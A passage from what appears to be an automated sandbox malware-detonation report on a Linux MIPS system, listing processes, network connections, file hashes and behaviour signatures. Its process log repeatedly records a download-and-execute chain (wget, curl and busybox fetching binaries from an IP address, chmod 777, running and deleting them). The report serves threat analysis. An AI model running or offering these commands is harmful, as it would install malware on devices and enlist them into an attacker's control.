| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
Processes
/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh
[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:02
Platform
debian9-mipsel-20240418-en
Max time kernel
55s
Max time network
57s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
